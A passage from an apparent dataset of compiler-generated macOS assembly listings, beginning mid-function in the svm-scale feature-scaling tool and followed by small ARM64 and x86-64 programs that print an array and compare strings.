Loop: Header=BB1_114 Depth=2 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero xorps %xmm1, %xmm1 ucomisd %xmm1, %xmm0 jbe LBB1_117 ## %bb.116: ## in Loop: Header=BB1_114 Depth=2 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -256(%rbp) ## 8-byte Spill jmp LBB1_118 LBB1_117: ## in Loop: Header=BB1_114 Depth=2 xorps %xmm0, %xmm0 movsd %xmm0, -256(%rbp) ## 8-byte Spill jmp LBB1_118 LBB1_118: ## in Loop: Header=BB1_114 Depth=2 movsd -256(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx xorps %xmm0, %xmm0 ucomisd (%rax,%rcx,8), %xmm0 jbe LBB1_120 ## %bb.119: ## in Loop: Header=BB1_114 Depth=2 movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -264(%rbp) ## 8-byte Spill jmp LBB1_121 LBB1_120: ## in Loop: Header=BB1_114 Depth=2 xorps %xmm0, %xmm0 movsd %xmm0, -264(%rbp) ## 8-byte Spill jmp LBB1_121 LBB1_121: ## in Loop: Header=BB1_114 Depth=2 movsd -264(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.122: ## in Loop: Header=BB1_114 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_114 LBB1_123: ## in Loop: Header=BB1_70 Depth=1 jmp LBB1_70 LBB1_124: movq -32(%rbp), %rdi callq _rewind cmpq $0, -56(%rbp) je LBB1_136 ## %bb.125: movq -40(%rbp), %rdi callq _fgetc movl %eax, -112(%rbp) cmpl $121, %eax jne LBB1_127 ## %bb.126: movq -40(%rbp), %rdi leaq L_.str.11(%rip), %rsi movq _y_lower@GOTPCREL(%rip), %rdx movq _y_upper@GOTPCREL(%rip), %rcx movb $0, %al callq _fscanf movq -40(%rbp), %rdi leaq L_.str.11(%rip), %rsi leaq _y_min(%rip), %rdx leaq _y_max(%rip), %rcx movb $0, %al callq _fscanf movl $1, _y_scaling(%rip) jmp LBB1_128 LBB1_127: movl -112(%rbp), %edi movq -40(%rbp), %rsi callq _ungetc LBB1_128: movq -40(%rbp), %rdi callq _fgetc cmpl $120, %eax jne LBB1_135 ## %bb.129: movq -40(%rbp), %rdi leaq L_.str.11(%rip), %rsi leaq _lower(%rip), %rdx leaq _upper(%rip), %rcx movb $0, %al callq _fscanf LBB1_130: ## =>This Inner Loop Header: Depth=1 movq -40(%rbp), %rdi leaq L_.str.12(%rip), %rsi leaq -108(%rbp), %rdx leaq -120(%rbp), %rcx leaq -128(%rbp), %r8 movb $0, %al callq _fscanf cmpl $3, %eax jne LBB1_134 ## %bb.131: ## in Loop: Header=BB1_130 Depth=1 movl -108(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jg LBB1_133 ## %bb.132: ## in Loop: Header=BB1_130 Depth=1 movsd -120(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -108(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movsd -128(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -108(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) LBB1_133: ## in Loop: Header=BB1_130 Depth=1 jmp LBB1_130 LBB1_134: jmp LBB1_135 LBB1_135: movq -40(%rbp), %rdi callq _fclose LBB1_136: cmpq $0, -48(%rbp) je LBB1_148 ## %bb.137: movq -48(%rbp), %rdi leaq L_.str.13(%rip), %rsi callq _fopen movq %rax, -136(%rbp) cmpq $0, -136(%rbp) jne LBB1_139 ## %bb.138: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq -48(%rbp), %rdx leaq L_.str.5(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_139: cmpl $0, _y_scaling(%rip) je LBB1_141 ## %bb.140: movq -136(%rbp), %rdi leaq L_.str.14(%rip), %rsi movb $0, %al callq _fprintf movq -136(%rbp), %rdi movq _y_lower@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movq _y_upper@GOTPCREL(%rip), %rax movsd (%rax), %xmm1 ## xmm1 = mem[0],zero leaq L_.str.15(%rip), %rsi movb $2, %al callq _fprintf movq -136(%rbp), %rdi movsd _y_min(%rip), %xmm0 ## xmm0 = mem[0],zero movsd _y_max(%rip), %xmm1 ## xmm1 = mem[0],zero leaq L_.str.15(%rip), %rsi movb $2, %al callq _fprintf LBB1_141: movq -136(%rbp), %rdi leaq L_.str.16(%rip), %rsi movb $0, %al callq _fprintf movq -136(%rbp), %rdi movsd _lower(%rip), %xmm0 ## xmm0 = mem[0],zero movsd _upper(%rip), %xmm1 ## xmm1 = mem[0],zero leaq L_.str.15(%rip), %rsi movb $2, %al callq _fprintf movl $1, -20(%rbp) LBB1_142: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jg LBB1_147 ## %bb.143: ## in Loop: Header=BB1_142 Depth=1 movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx ucomisd (%rax,%rcx,8), %xmm0 jne LBB1_144 jp LBB1_144 jmp LBB1_145 LBB1_144: ## in Loop: Header=BB1_142 Depth=1 movq -136(%rbp), %rdi movl -20(%rbp), %edx movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero leaq L_.str.17(%rip), %rsi movb $2, %al callq _fprintf LBB1_145: ## in Loop: Header=BB1_142 Depth=1 jmp LBB1_146 LBB1_146: ## in Loop: Header=BB1_142 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_142 LBB1_147: movq -136(%rbp), %rdi callq _fclose LBB1_148: jmp LBB1_149 LBB1_149: ## =>This Loop Header: Depth=1 ## Child Loop BB1_151 Depth 2 ## Child Loop BB1_154 Depth 2 ## Child Loop BB1_157 Depth 2 ## Child Loop BB1_159 Depth 3 ## Child Loop BB1_163 Depth 3 ## Child Loop BB1_166 Depth 3 ## Child Loop BB1_169 Depth 3 ## Child Loop BB1_175 Depth 2 movq -32(%rbp), %rdi callq _readline cmpq $0, %rax je LBB1_179 ## %bb.150: ## in Loop: Header=BB1_149 Depth=1 movq _line(%rip), %rax movq %rax, -144(%rbp) movl $1, -148(%rbp) movq -144(%rbp), %rdi leaq L_.str.9(%rip), %rsi leaq -160(%rbp), %rdx movb $0, %al callq _sscanf movsd -160(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _output_target LBB1_151: ## Parent Loop BB1_149 Depth=1 ## => This Inner Loop Header: Depth=2 movq -144(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_153 ## %bb.152: ## in Loop: Header=BB1_151 Depth=2 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) jmp LBB1_151 LBB1_153: ## in Loop: Header=BB1_149 Depth=1 jmp LBB1_154 LBB1_154: ## Parent Loop BB1_149 Depth=1 ## => This Inner Loop Header: Depth=2 movq -144(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al testb $1, %al jne LBB1_155 jmp LBB1_156 LBB1_155: ## in Loop: Header=BB1_154 Depth=2 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) jmp LBB1_154 LBB1_156: ## in Loop: Header=BB1_149 Depth=1 jmp LBB1_157 LBB1_157: ## Parent Loop BB1_149 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB1_159 Depth 3 ## Child Loop BB1_163 Depth 3 ## Child Loop BB1_166 Depth 3 ## Child Loop BB1_169 Depth 3 movq -144(%rbp), %rdi leaq L_.str.10(%rip), %rsi leaq -24(%rbp), %rdx leaq -168(%rbp), %rcx movb $0, %al callq _sscanf cmpl $2, %eax jne LBB1_174 ## %bb.158: ## in Loop: Header=BB1_157 Depth=2 movl -148(%rbp), %eax movl %eax, -20(%rbp) LBB1_159: ## Parent Loop BB1_149 Depth=1 ## Parent Loop BB1_157 Depth=2 ## => This Inner Loop Header: Depth=3 movl -20(%rbp), %eax cmpl -24(%rbp), %eax jge LBB1_162 ## %bb.160: ## in Loop: Header=BB1_159 Depth=3 movl -20(%rbp), %edi xorps %xmm0, %xmm0 callq _output ## %bb.161: ## in Loop: Header=BB1_159 Depth=3 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_159 LBB1_162: ## in Loop: Header=BB1_157 Depth=2 movl -24(%rbp), %edi movsd -168(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _output LBB1_163: ## Parent Loop BB1_149 Depth=1 ## Parent Loop BB1_157 Depth=2 ## => This Inner Loop Header: Depth=3 movq -144(%rbp), %rax movsbl (%rax), %eax cmpl $58, %eax je LBB1_165 ## %bb.164: ## in Loop: Header=BB1_163 Depth=3 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) jmp LBB1_163 LBB1_165: ## in Loop: Header=BB1_157 Depth=2 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) LBB1_166: ## Parent Loop BB1_149 Depth=1 ## Parent Loop BB1_157 Depth=2 ## => This Inner Loop Header: Depth=3 movq -144(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_168 ## %bb.167: ## in Loop: Header=BB1_166 Depth=3 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) jmp LBB1_166 LBB1_168: ## in Loop: Header=BB1_157 Depth=2 jmp LBB1_169 LBB1_169: ## Parent Loop BB1_149 Depth=1 ## Parent Loop BB1_157 Depth=2 ## => This Inner Loop Header: Depth=3 movq -144(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -265(%rbp) ## 1-byte Spill je LBB1_171 ## %bb.170: ## in Loop: Header=BB1_169 Depth=3 movq -144(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al movb %al, -265(%rbp) ## 1-byte Spill LBB1_171: ## in Loop: Header=BB1_169 Depth=3 movb -265(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_172 jmp LBB1_173 LBB1_172: ## in Loop: Header=BB1_169 Depth=3 movq -144(%rbp), %rax addq $1, %rax movq %rax, -144(%rbp) jmp LBB1_169 LBB1_173: ## in Loop: Header=BB1_157 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -148(%rbp) jmp LBB1_157 LBB1_174: ## in Loop: Header=BB1_149 Depth=1 movl -148(%rbp), %eax movl %eax, -20(%rbp) LBB1_175: ## Parent Loop BB1_149 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jg LBB1_178 ## %bb.176: ## in Loop: Header=BB1_175 Depth=2 movl -20(%rbp), %edi xorps %xmm0, %xmm0 callq _output ## %bb.177: ## in Loop: Header=BB1_175 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_175 LBB1_178: ## in Loop: Header=BB1_149 Depth=1 leaq L_.str.18(%rip), %rdi movb $0, %al callq _printf jmp LBB1_149 LBB1_179: movq _new_num_nonzeros(%rip), %rax cmpq _num_nonzeros(%rip), %rax jle LBB1_181 ## %bb.180: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq _num_nonzeros(%rip), %rdx movq _new_num_nonzeros(%rip), %rcx leaq L_.str.19(%rip), %rsi movb $0, %al callq _fprintf LBB1_181: movq _line(%rip), %rdi callq _free movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _free movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _free movq -32(%rbp), %rdi callq _fclose xorl %eax, %eax addq $272, %rsp ## imm = 0x110 popq %rbp retq .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L1_0_set_5, LBB1_5-LJTI1_0 .set L1_0_set_10, LBB1_10-LJTI1_0 .set L1_0_set_9, LBB1_9-LJTI1_0 .set L1_0_set_8, LBB1_8-LJTI1_0 .set L1_0_set_6, LBB1_6-LJTI1_0 .set L1_0_set_7, LBB1_7-LJTI1_0 LJTI1_0: .long L1_0_set_5 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_9 .long L1_0_set_8 .long L1_0_set_10 .long L1_0_set_6 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_10 .long L1_0_set_7 .end_data_region ## -- End function .globl _readline ## -- Begin function readline .p2align 4, 0x90 _readline: ## @readline .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq _line(%rip), %rdi movl _max_line_len(%rip), %esi movq -16(%rbp), %rdx callq _fgets cmpq $0, %rax jne LBB2_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB2_8 LBB2_2: jmp LBB2_3 LBB2_3: ## =>This Inner Loop Header: Depth=1 movq _line(%rip), %rdi movl $10, %esi callq _strrchr cmpq $0, %rax jne LBB2_7 ## %bb.4: ## in Loop: Header=BB2_3 Depth=1 movl _max_line_len(%rip), %eax shll $1, %eax movl %eax, _max_line_len(%rip) movq _line(%rip), %rdi movslq _max_line_len(%rip), %rsi callq _realloc movq %rax, _line(%rip) movq _line(%rip), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -20(%rbp) movq _line(%rip), %rdi movslq -20(%rbp), %rax addq %rax, %rdi movl _max_line_len(%rip), %esi subl -20(%rbp), %esi movq -16(%rbp), %rdx callq _fgets cmpq $0, %rax jne LBB2_6 ## %bb.5: jmp LBB2_7 LBB2_6: ## in Loop: Header=BB2_3 Depth=1 jmp LBB2_3 LBB2_7: movq _line(%rip), %rax movq %rax, -8(%rbp) LBB2_8: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _output_target ## -- Begin function output_target .p2align 4, 0x90 _output_target: ## @output_target .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movsd %xmm0, -8(%rbp) cmpl $0, _y_scaling(%rip) je LBB3_8 ## %bb.1: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero ucomisd _y_min(%rip), %xmm0 jne LBB3_3 jp LBB3_3 ## %bb.2: movq _y_lower@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -8(%rbp) jmp LBB3_7 LBB3_3: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero ucomisd _y_max(%rip), %xmm0 jne LBB3_5 jp LBB3_5 ## %bb.4: movq _y_upper@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -8(%rbp) jmp LBB3_6 LBB3_5: movq _y_lower@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movq _y_upper@GOTPCREL(%rip), %rax movsd (%rax), %xmm1 ## xmm1 = mem[0],zero movq _y_lower@GOTPCREL(%rip), %rax subsd (%rax), %xmm1 movsd -8(%rbp), %xmm2 ## xmm2 = mem[0],zero subsd _y_min(%rip), %xmm2 mulsd %xmm2, %xmm1 movsd _y_max(%rip), %xmm2 ## xmm2 = mem[0],zero subsd _y_min(%rip), %xmm2 divsd %xmm2, %xmm1 addsd %xmm1, %xmm0 movsd %xmm0, -8(%rbp) LBB3_6: jmp LBB3_7 LBB3_7: jmp LBB3_8 LBB3_8: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.20(%rip), %rdi movb $1, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _output ## -- Begin function output .p2align 4, 0x90 _output: ## @output .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movsd %xmm0, -16(%rbp) movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx ucomisd (%rax,%rcx,8), %xmm0 jne LBB4_2 jp LBB4_2 ## %bb.1: jmp LBB4_10 LBB4_2: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx ucomisd (%rax,%rcx,8), %xmm0 jne LBB4_4 jp LBB4_4 ## %bb.3: movsd _lower(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -16(%rbp) jmp LBB4_8 LBB4_4: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx ucomisd (%rax,%rcx,8), %xmm0 jne LBB4_6 jp LBB4_6 ## %bb.5: movsd _upper(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -16(%rbp) jmp LBB4_7 LBB4_6: movsd _lower(%rip), %xmm0 ## xmm0 = mem[0],zero movsd _upper(%rip), %xmm1 ## xmm1 = mem[0],zero subsd _lower(%rip), %xmm1 movsd -16(%rbp), %xmm2 ## xmm2 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx subsd (%rax,%rcx,8), %xmm2 mulsd %xmm2, %xmm1 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -4(%rbp), %rcx subsd (%rax,%rcx,8), %xmm2 divsd %xmm2, %xmm1 addsd %xmm1, %xmm0 movsd %xmm0, -16(%rbp) LBB4_7: jmp LBB4_8 LBB4_8: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero xorps %xmm1, %xmm1 ucomisd %xmm1, %xmm0 jne LBB4_9 jp LBB4_9 jmp LBB4_10 LBB4_9: movl -4(%rbp), %esi movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.21(%rip), %rdi movb $1, %al callq _printf movq _new_num_nonzeros(%rip), %rax addq $1, %rax movq %rax, _new_num_nonzeros(%rip) LBB4_10: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Usage: svm-scale [options] data_filename\noptions:\n-l lower : x scaling lower limit (default -1)\n-u upper : x scaling upper limit (default +1)\n-y y_lower y_upper : y scaling limits (default: no y scaling)\n-s save_filename : save scaling parameters to save_filename\n-r restore_filename : restore scaling parameters from restore_filename\n" .globl _line ## @line .zerofill __DATA,__common,_line,8,3 .section __DATA,__data .globl _max_line_len ## @max_line_len .p2align 2 _max_line_len: .long 1024 ## 0x400 .globl _lower ## @lower .p2align 3 _lower: .quad 0xbff0000000000000 ## double -1 .globl _upper ## @upper .p2align 3 _upper: .quad 0x3ff0000000000000 ## double 1 .globl _y_scaling ## @y_scaling .zerofill __DATA,__common,_y_scaling,4,2 .globl _y_max ## @y_max .p2align 3 _y_max: .quad 0xffefffffffffffff ## double -1.7976931348623157E+308 .globl _y_min ## @y_min .p2align 3 _y_min: .quad 0x7fefffffffffffff ## double 1.7976931348623157E+308 .globl _num_nonzeros ## @num_nonzeros .zerofill __DATA,__common,_num_nonzeros,8,3 .globl _new_num_nonzeros ## @new_num_nonzeros .zerofill __DATA,__common,_new_num_nonzeros,8,3 .comm _y_lower,8,3 ## @y_lower .comm _y_upper,8,3 ## @y_upper .section __TEXT,__cstring,cstring_literals L_.str.1: ## @.str.1 .asciz "unknown option\n" L_.str.2: ## @.str.2 .asciz "inconsistent lower/upper specification\n" L_.str.3: ## @.str.3 .asciz "cannot use -r and -s simultaneously\n" L_.str.4: ## @.str.4 .asciz "r" L_.str.5: ## @.str.5 .asciz "can't open file %s\n" .comm _max_index,4,2 ## @max_index L_.str.6: ## @.str.6 .asciz "%d %*f %*f\n" L_.str.7: ## @.str.7 .asciz "%d:%*f" .comm _feature_max,8,3 ## @feature_max .comm _feature_min,8,3 ## @feature_min L_.str.8: ## @.str.8 .asciz "can't allocate enough memory\n" L_.str.9: ## @.str.9 .asciz "%lf" L_.str.10: ## @.str.10 .asciz "%d:%lf" L_.str.11: ## @.str.11 .asciz "%lf %lf\n" L_.str.12: ## @.str.12 .asciz "%d %lf %lf\n" L_.str.13: ## @.str.13 .asciz "w" L_.str.14: ## @.str.14 .asciz "y\n" L_.str.15: ## @.str.15 .asciz "%.16g %.16g\n" L_.str.16: ## @.str.16 .asciz "x\n" L_.str.17: ## @.str.17 .asciz "%d %.16g %.16g\n" L_.str.18: ## @.str.18 .asciz "\n" L_.str.19: ## @.str.19 .asciz "Warning: original #nonzeros %ld\n new #nonzeros %ld\nUse -l 0 if many original feature values are zeros\n" L_.str.20: ## @.str.20 .asciz "%g " L_.str.21: ## @.str.21 .asciz "%d:%g " .subsections_via_symbols
the_stack_data/103264371.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur wzr, [x29, #-8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 ldursw x10, [x29, #-8] adrp x9, _a@GOTPAGE ldr x9, [x9, _a@GOTPAGEOFF] str w8, [x9, x10, lsl #2] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB0_1 LBB0_4: stur wzr, [x29, #-12] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldursw x9, [x29, #-12] adrp x8, _a@GOTPAGE ldr x8, [x8, _a@GOTPAGEOFF] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_5 LBB0_8: mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .comm _a,40,2 ; @a .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $0, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $10, -8(%rbp) jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %edx addl $1, %edx movslq -8(%rbp), %rcx movq _a@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_4: movl $0, -12(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 cmpl $10, -12(%rbp) jge LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movslq -12(%rbp), %rcx movq _a@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB0_5 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_5 LBB0_8: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _a,40,4 ## @a .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d\n" .subsections_via_symbols
the_stack_data/72013055.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x8, l_.str@PAGE add x8, x8, l_.str@PAGEOFF stur x8, [x29, #-16] adrp x8, l_.str.1@PAGE add x8, x8, l_.str.1@PAGEOFF stur x8, [x29, #-24] adrp x8, l_.str.2@PAGE add x8, x8, l_.str.2@PAGEOFF str x8, [sp, #32] ldur x0, [x29, #-24] ldur x1, [x29, #-16] bl _strcmp str w0, [sp, #28] ldr w8, [sp, #28] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x10, [x29, #-24] ldur x8, [x29, #-16] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_3 LBB0_2: ldur x10, [x29, #-24] ldur x8, [x29, #-16] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_3 LBB0_3: ldur x0, [x29, #-24] ldr x1, [sp, #32] bl _strcmp str w0, [sp, #28] ldr w8, [sp, #28] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ldur x10, [x29, #-24] ldr x8, [sp, #32] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_6 LBB0_5: ldur x10, [x29, #-24] ldr x8, [sp, #32] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_6 LBB0_6: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "abc" l_.str.1: ; @.str.1 .asciz "bc" l_.str.2: ; @.str.2 .asciz "c" l_.str.3: ; @.str.3 .asciz "\"%s\" is greater than \"%s\"" l_.str.4: ; @.str.4 .asciz "\n\"%s\" is less than \"%s\"" l_.str.5: ; @.str.5 .asciz "\n\"%s\" is greater than \"%s\"" .subsections_via_symbols
